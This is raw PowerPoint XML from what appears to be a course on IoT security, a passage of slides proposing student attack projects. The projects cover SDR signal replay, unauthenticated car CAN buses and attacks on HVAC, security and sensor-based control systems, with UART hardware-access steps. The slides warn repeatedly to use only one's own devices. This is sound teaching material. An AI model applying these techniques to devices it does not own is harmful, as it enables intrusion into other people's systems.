            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Record signals on your SDR and play them back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Your garage only, please.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17A7950-415C-CD4C-8C6D-6C0BC699C256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2220907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36" y="0"/>
            <a:ext cx="11823140"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IoT based car</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2202872"/>
            <a:ext cx="11391207" cy="430025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Please do NOT implement it.  Seriously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can buses have unauthenticated endpoints and often interconnect control and entertainment channels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What a mess.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F5D570-6D78-3742-8070-122FE2D5E28B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776886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37" y="136525"/>
            <a:ext cx="11823925"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IoT based HVAC system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2341418"/>
            <a:ext cx="11582400" cy="416171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You’ll have to collect design data from common manufacturers like Siemens, ABB, GE and Schneider Electric.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Don’t implement these unless you figure out a way to model the system in software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ADDE4DD-11D9-8F47-87CC-FE5CE9EE8BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29898866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868"/>
            <a:ext cx="11915876"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IoT based entertainment system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2244436"/>
            <a:ext cx="11582400" cy="425869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MP3 players, Alexa,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Your devices only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Some devices have nifty security features.  On Alexa, you may have to break the case to get access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So what information goes back to the provider?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E137F0-B8DB-0C49-B557-5AE963175E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284449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 – details, 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1301432"/>
            <a:ext cx="11263745" cy="555656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Locate the UART on the IoT device.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In the picture, the UART connection is located on the main board at the upper right corner when power connection is at bottom right.  There are 3 or 4 pins (4 if Vcc is present).  I solder wire stubs to facilitate connections.   The signal pins are gnd, vcc, rx, tx.  To figure out which is which:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ground is easy to find with an multimeter.  V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is also easy to find with a multimeter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We have to distinguish between RX and TX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TX will transmit on bootup, you’ll see voltage swings or, if you connect an oscilloscope, you’ll see  waveforms.  TX has 1.8, 3.3 or 5V.  RX is 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Connect the Badge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You need USB to mini USB cable.  Connect one to the computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and the other one to mini-USB connector on attify badge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Wire Attify badge pins to IoT pins as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT Pin</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Attify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tx		D1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rx		D0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gnd		Gnd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Don’t connect Vcc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F73BA4D-DE87-1745-A836-73977DCE65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61218" y="3422434"/>
            <a:ext cx="3699164" cy="2774373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC6F672-7351-1442-B231-E5250B83B22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10422065" y="6331228"/>
            <a:ext cx="1253869" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attify pins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615A438F-6C11-BE45-A6F1-CE510A69493E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10557164" y="5902038"/>
            <a:ext cx="138546" cy="33633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8A758680-BEA8-3040-AD11-5CD19A1A05DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22608376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0" y="49805"/>
            <a:ext cx="12006470"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IoT based security system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2216726"/>
            <a:ext cx="11582400" cy="4286405"/>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The doorbells we mentioned earlier are an example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So are the IP cameras.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Your devices only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Liberty Insurance will want to hear all about it.</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211E17AD-D094-6142-84C7-1CA246C97B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872512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195" y="235814"/>
            <a:ext cx="11823925"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 a IoT based scientific instrument system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2100255"/>
            <a:ext cx="11582400" cy="399545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Maybe oscilloscopes and Digital meters with digital I/O.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This can be medical devices but  NEVER, NEVER attack real medical devices.  They are incredibly insecure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This whole area is scary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>However: if you work for one of these companies please use what you’ve learned to make them safer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3AD975-BDF9-B04C-9E0A-463670AA7790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680317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01" y="455179"/>
            <a:ext cx="11881798" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Develop a sensor based attack on some control system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="2315730"/>
            <a:ext cx="11582400" cy="440574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Maybe messing with a drone altimeter or compass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Home control?  Lights? Blinds?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The potential for side channels here is mind boggling.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534577F7-9571-A547-A73A-99264D4DE112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
